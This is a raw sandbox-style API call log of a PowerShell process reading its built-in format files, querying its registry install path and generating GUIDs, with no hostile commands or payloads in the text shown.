	[0532.151] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.152] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.152] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.152] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.153] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.153] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0xe67, lpOverlapped=0x0) returned 1
	[0532.153] ReadFile (in: hFile=0x2dc, lpBuffer=0x370aa8f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370aa8f*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0532.153] ReadFile (in: hFile=0x2dc, lpBuffer=0x370b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x370b4c0*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0532.154] CloseHandle (hObject=0x2dc) returned 1
	[0532.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0532.154] SetErrorMode (uMode=0x1) returned 0x1
	[0532.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0532.154] SetErrorMode (uMode=0x1) returned 0x1
	[0532.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0532.155] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x2dc) returned 0x0
	[0532.155] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0532.155] CoTaskMemAlloc (cb=0x5a) returned 0x3eaa40
	[0532.155] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x3eaa40, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0532.155] CoTaskMemFree (pv=0x3eaa40) 
	[0532.155] RegCloseKey (hKey=0x2dc) returned 0x0
	[0532.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0532.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0532.160] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x3b4c9071, Data2=0xfc4, Data3=0x47ba, Data4=([0]=0x9c, [1]=0x82, [2]=0x33, [3]=0x66, [4]=0xf4, [5]=0x82, [6]=0x6e, [7]=0xe6))) returned 0x0
	[0532.160] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x973a8361, Data2=0x99f9, Data3=0x4574, Data4=([0]=0xa5, [1]=0x88, [2]=0xb6, [3]=0x6, [4]=0x55, [5]=0xb, [6]=0x6c, [7]=0x18))) returned 0x0
	[0532.161] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x63d5efda, Data2=0xc8ab, Data3=0x420a, Data4=([0]=0xae, [1]=0x16, [2]=0x51, [3]=0xac, [4]=0x15, [5]=0xf5, [6]=0x21, [7]=0x31))) returned 0x0
	[0532.161] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x75b9b0a9, Data2=0xcbd8, Data3=0x42eb, Data4=([0]=0xaa, [1]=0x28, [2]=0xd7, [3]=0x8b, [4]=0x70, [5]=0xaf, [6]=0x33, [7]=0xfe))) returned 0x0
	[0532.162] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x3b34470a, Data2=0xc52f, Data3=0x43bd, Data4=([0]=0xb3, [1]=0x15, [2]=0x9d, [3]=0x9f, [4]=0x2c, [5]=0xe5, [6]=0x73, [7]=0x9d))) returned 0x0
	[0532.163] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x39d01a7b, Data2=0x5f39, Data3=0x4d4c, Data4=([0]=0xb9, [1]=0x9e, [2]=0xf7, [3]=0x53, [4]=0xd4, [5]=0xd8, [6]=0xf9, [7]=0x75))) returned 0x0
	[0532.163] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x2e7e0ea3, Data2=0xa537, Data3=0x488f, Data4=([0]=0x82, [1]=0x87, [2]=0x10, [3]=0xd7, [4]=0x79, [5]=0xbc, [6]=0x80, [7]=0xdd))) returned 0x0
	[0532.163] VirtualQuery (in: lpAddress=0x1eba00, lpBuffer=0x1ec8c0, dwLength=0x30 | out: lpBuffer=0x1ec8c0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0532.165] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xec29efe0, Data2=0xb751, Data3=0x47fc, Data4=([0]=0x94, [1]=0x1e, [2]=0x82, [3]=0xcb, [4]=0xd3, [5]=0xdd, [6]=0x65, [7]=0xb8))) returned 0x0
	[0532.855] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xedd4690c, Data2=0x21f1, Data3=0x463d, Data4=([0]=0xad, [1]=0x10, [2]=0xbf, [3]=0x51, [4]=0xce, [5]=0xb2, [6]=0xd0, [7]=0x76))) returned 0x0
	[0532.855] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x89f409d9, Data2=0xb3fd, Data3=0x4a97, Data4=([0]=0xa3, [1]=0x10, [2]=0xd8, [3]=0xc7, [4]=0xa6, [5]=0xc6, [6]=0x15, [7]=0x65))) returned 0x0
	[0532.856] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x56c80e21, Data2=0xaf0d, Data3=0x48ce, Data4=([0]=0xac, [1]=0xd1, [2]=0xd2, [3]=0x66, [4]=0xe2, [5]=0xd9, [6]=0x5e, [7]=0xf4))) returned 0x0
	[0532.857] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xe9e97159, Data2=0xc5ec, Data3=0x4c7a, Data4=([0]=0x8c, [1]=0x63, [2]=0x9d, [3]=0xe9, [4]=0xdc, [5]=0xf4, [6]=0xc3, [7]=0xe2))) returned 0x0
	[0532.857] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x4a3e1fc9, Data2=0x43a9, Data3=0x4f59, Data4=([0]=0x84, [1]=0x54, [2]=0xfc, [3]=0xe9, [4]=0xec, [5]=0x57, [6]=0xf7, [7]=0xdb))) returned 0x0
	[0532.857] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xb93f8807, Data2=0xc513, Data3=0x4da7, Data4=([0]=0x87, [1]=0xa2, [2]=0x35, [3]=0x61, [4]=0x9a, [5]=0x44, [6]=0x73, [7]=0x1b))) returned 0x0
	[0532.857] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x61650bab, Data2=0x6d84, Data3=0x4122, Data4=([0]=0xb4, [1]=0xf0, [2]=0x27, [3]=0x99, [4]=0xc7, [5]=0x49, [6]=0x23, [7]=0xea))) returned 0x0
	[0532.857] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x27608294, Data2=0x2f3b, Data3=0x4836, Data4=([0]=0x99, [1]=0xe8, [2]=0x1b, [3]=0x8e, [4]=0x88, [5]=0xfe, [6]=0xa4, [7]=0x3e))) returned 0x0
	[0532.857] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xece10261, Data2=0xbdeb, Data3=0x456b, Data4=([0]=0x92, [1]=0x65, [2]=0x75, [3]=0x93, [4]=0xa9, [5]=0xbe, [6]=0x3, [7]=0xf4))) returned 0x0
	[0532.857] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x7941dbad, Data2=0xe26f, Data3=0x40db, Data4=([0]=0xaa, [1]=0xb1, [2]=0xe8, [3]=0x1f, [4]=0x46, [5]=0x7, [6]=0x7b, [7]=0x5))) returned 0x0
	[0532.858] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xcb308957, Data2=0x4082, Data3=0x4623, Data4=([0]=0x99, [1]=0xb, [2]=0x4f, [3]=0x3e, [4]=0xb2, [5]=0x49, [6]=0x8f, [7]=0xe1))) returned 0x0
	[0532.858] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x970b209e, Data2=0xbd6, Data3=0x450c, Data4=([0]=0xb8, [1]=0x80, [2]=0xd, [3]=0xd0, [4]=0xf5, [5]=0x60, [6]=0x95, [7]=0x2e))) returned 0x0
	[0532.858] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xb82cb0ef, Data2=0xbd16, Data3=0x4bbc, Data4=([0]=0x89, [1]=0xe7, [2]=0xb1, [3]=0x41, [4]=0x2, [5]=0xa7, [6]=0x58, [7]=0xe))) returned 0x0
	[0532.859] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x8358d644, Data2=0x6e7b, Data3=0x48d7, Data4=([0]=0x9d, [1]=0xd3, [2]=0x93, [3]=0x7d, [4]=0x44, [5]=0xc7, [6]=0xa0, [7]=0xe1))) returned 0x0
	[0532.859] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x6e4dd470, Data2=0x2cbf, Data3=0x437f, Data4=([0]=0x81, [1]=0xd1, [2]=0xb0, [3]=0xff, [4]=0x31, [5]=0xca, [6]=0x7, [7]=0x41))) returned 0x0
	[0532.859] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x959bda2b, Data2=0xbfbf, Data3=0x4264, Data4=([0]=0x9e, [1]=0xf2, [2]=0x3, [3]=0x75, [4]=0x79, [5]=0x2, [6]=0xe4, [7]=0x56))) returned 0x0
	[0532.859] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x9fb36cc6, Data2=0x81ae, Data3=0x42d3, Data4=([0]=0x8f, [1]=0x95, [2]=0x5, [3]=0xa1, [4]=0xc7, [5]=0x36, [6]=0xa8, [7]=0xea))) returned 0x0
	[0532.859] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa780f1a2, Data2=0x630d, Data3=0x4af4, Data4=([0]=0xb7, [1]=0xb4, [2]=0x6d, [3]=0xd1, [4]=0x0, [5]=0x6, [6]=0xde, [7]=0x28))) returned 0x0
	[0532.859] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x8486eb8c, Data2=0x7f4b, Data3=0x4f71, Data4=([0]=0xb8, [1]=0xdf, [2]=0xa4, [3]=0xaa, [4]=0x8c, [5]=0x2f, [6]=0xb8, [7]=0x62))) returned 0x0
	[0532.860] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x11cfd84e, Data2=0xeb9c, Data3=0x4b55, Data4=([0]=0xb1, [1]=0xa8, [2]=0xb3, [3]=0x5a, [4]=0xab, [5]=0xe5, [6]=0xc, [7]=0xd9))) returned 0x0
	[0532.860] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xfddb8893, Data2=0x19a9, Data3=0x470d, Data4=([0]=0x95, [1]=0xa6, [2]=0xf5, [3]=0xc0, [4]=0xa2, [5]=0xce, [6]=0x7f, [7]=0xa1))) returned 0x0
	[0532.860] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x28be5cd4, Data2=0x5fc5, Data3=0x422c, Data4=([0]=0x8b, [1]=0x82, [2]=0x8e, [3]=0x40, [4]=0xc9, [5]=0x18, [6]=0x5e, [7]=0x1d))) returned 0x0
	[0532.860] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xae939cb1, Data2=0x932e, Data3=0x4167, Data4=([0]=0xbd, [1]=0xaa, [2]=0xef, [3]=0x29, [4]=0x40, [5]=0x12, [6]=0xf0, [7]=0x46))) returned 0x0
	[0532.860] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xad5b57f9, Data2=0x37a, Data3=0x40ac, Data4=([0]=0xbe, [1]=0x88, [2]=0x7, [3]=0xff, [4]=0xa1, [5]=0xf9, [6]=0xe, [7]=0x89))) returned 0x0
	[0532.860] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc807aa89, Data2=0x76bd, Data3=0x4e28, Data4=([0]=0xb1, [1]=0x82, [2]=0x86, [3]=0xfe, [4]=0xc, [5]=0x35, [6]=0xff, [7]=0x35))) returned 0x0
	[0532.865] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xbf5dc1f7, Data2=0xa6e6, Data3=0x4c3a, Data4=([0]=0x82, [1]=0x6c, [2]=0x2c, [3]=0x3d, [4]=0x78, [5]=0xb8, [6]=0xc4, [7]=0xea))) returned 0x0
	[0532.866] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x24438cce, Data2=0xad23, Data3=0x4cb9, Data4=([0]=0x8a, [1]=0xec, [2]=0x7a, [3]=0x9e, [4]=0x5, [5]=0x1f, [6]=0xa7, [7]=0xa7))) returned 0x0
	[0532.866] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x9c4ea5c3, Data2=0xee8f, Data3=0x45ef, Data4=([0]=0x86, [1]=0xdd, [2]=0x91, [3]=0xe0, [4]=0xc9, [5]=0x61, [6]=0x93, [7]=0x6))) returned 0x0
	[0532.866] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xf9da3cbb, Data2=0x7ff0, Data3=0x4339, Data4=([0]=0xa4, [1]=0x33, [2]=0xed, [3]=0xd7, [4]=0x8a, [5]=0x45, [6]=0xb5, [7]=0xc2))) returned 0x0
	[0532.866] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x34cb232, Data2=0x1454, Data3=0x4a6e, Data4=([0]=0x8c, [1]=0x84, [2]=0x12, [3]=0x89, [4]=0x3, [5]=0xc6, [6]=0x7d, [7]=0x6c))) returned 0x0
	[0532.866] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x9b5d7a2c, Data2=0xa40d, Data3=0x4e77, Data4=([0]=0xb1, [1]=0xc6, [2]=0x86, [3]=0x9, [4]=0xd8, [5]=0xc8, [6]=0x3f, [7]=0x33))) returned 0x0
	[0532.866] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x14510598, Data2=0x6008, Data3=0x4a3a, Data4=([0]=0xa4, [1]=0x23, [2]=0x91, [3]=0x47, [4]=0xb4, [5]=0x1d, [6]=0xc6, [7]=0xc9))) returned 0x0
	[0532.867] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x978cfd90, Data2=0x11e1, Data3=0x4777, Data4=([0]=0xa6, [1]=0xec, [2]=0xe3, [3]=0x75, [4]=0xec, [5]=0x8e, [6]=0x83, [7]=0x64))) returned 0x0
	[0532.867] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa9ca2162, Data2=0xf5eb, Data3=0x4f15, Data4=([0]=0xa5, [1]=0xd8, [2]=0x7a, [3]=0x8c, [4]=0x49, [5]=0xb8, [6]=0x43, [7]=0x9b))) returned 0x0
	[0532.867] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x1aa0e332, Data2=0xd1c7, Data3=0x4892, Data4=([0]=0x87, [1]=0x68, [2]=0xb, [3]=0xa0, [4]=0xc1, [5]=0xa8, [6]=0x4f, [7]=0x99))) returned 0x0
	[0532.867] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x104573f3, Data2=0x367c, Data3=0x45f4, Data4=([0]=0xa3, [1]=0xa8, [2]=0x0, [3]=0xf7, [4]=0x8d, [5]=0x4a, [6]=0x90, [7]=0x2a))) returned 0x0
	[0532.868] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa9a1c59f, Data2=0x539e, Data3=0x4a24, Data4=([0]=0xb1, [1]=0xe, [2]=0x91, [3]=0xa2, [4]=0x1d, [5]=0x9c, [6]=0x45, [7]=0x10))) returned 0x0
	[0532.868] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x57190b96, Data2=0xefdd, Data3=0x47b5, Data4=([0]=0x8e, [1]=0xbe, [2]=0x20, [3]=0xb5, [4]=0xc4, [5]=0xc0, [6]=0xfe, [7]=0xa2))) returned 0x0
	[0532.868] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x7cc43598, Data2=0x677b, Data3=0x48f5, Data4=([0]=0x8e, [1]=0xf7, [2]=0x88, [3]=0x62, [4]=0x31, [5]=0x5e, [6]=0xae, [7]=0x16))) returned 0x0
	[0532.868] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xfffeea23, Data2=0x9011, Data3=0x41c5, Data4=([0]=0x98, [1]=0x3f, [2]=0x9d, [3]=0x68, [4]=0xaa, [5]=0x7c, [6]=0xb3, [7]=0x48))) returned 0x0
	[0532.869] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0532.869] GetFileType (hFile=0x2dc) returned 0x1
	[0532.869] SetErrorMode (uMode=0x1) returned 0x1
	[0532.869] GetFileType (hFile=0x2dc) returned 0x1
	[0532.869] ReadFile (in: hFile=0x2dc, lpBuffer=0x3869458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3869458*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.870] ReadFile (in: hFile=0x2dc, lpBuffer=0x3869458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3869458*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.871] ReadFile (in: hFile=0x2dc, lpBuffer=0x3869458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3869458*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.871] ReadFile (in: hFile=0x2dc, lpBuffer=0x3869458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3869458*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.872] ReadFile (in: hFile=0x2dc, lpBuffer=0x3869458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3869458*, lpNumberOfBytesRead=0x1ecd98*=0x8b4, lpOverlapped=0x0) returned 1
	[0532.872] ReadFile (in: hFile=0x2dc, lpBuffer=0x3868874, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3868874*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0532.872] ReadFile (in: hFile=0x2dc, lpBuffer=0x3869458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3869458*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0532.872] CloseHandle (hObject=0x2dc) returned 1
	[0532.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0532.872] SetErrorMode (uMode=0x1) returned 0x1
	[0532.873] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0532.873] SetErrorMode (uMode=0x1) returned 0x1
	[0532.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0532.873] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x2dc) returned 0x0
	[0532.873] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0532.873] CoTaskMemAlloc (cb=0x5a) returned 0x3eaa40
	[0532.873] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x3eaa40, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0532.873] CoTaskMemFree (pv=0x3eaa40) 
	[0532.873] RegCloseKey (hKey=0x2dc) returned 0x0
	[0532.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0532.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0532.875] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x3c425e54, Data2=0x4abf, Data3=0x4953, Data4=([0]=0xba, [1]=0x1e, [2]=0xd5, [3]=0xd2, [4]=0x13, [5]=0x81, [6]=0x41, [7]=0x89))) returned 0x0
	[0532.875] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xb383ba0a, Data2=0x1fa9, Data3=0x426a, Data4=([0]=0x8a, [1]=0x46, [2]=0x6f, [3]=0x7b, [4]=0xeb, [5]=0xe4, [6]=0xd, [7]=0x1e))) returned 0x0
	[0532.875] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0532.876] GetFileType (hFile=0x2dc) returned 0x1
	[0532.876] SetErrorMode (uMode=0x1) returned 0x1
	[0532.876] GetFileType (hFile=0x2dc) returned 0x1
	[0532.876] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a7240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x38a7240*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.877] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a7240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x38a7240*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.878] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a7240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x38a7240*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0532.878] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a7240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x38a7240*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
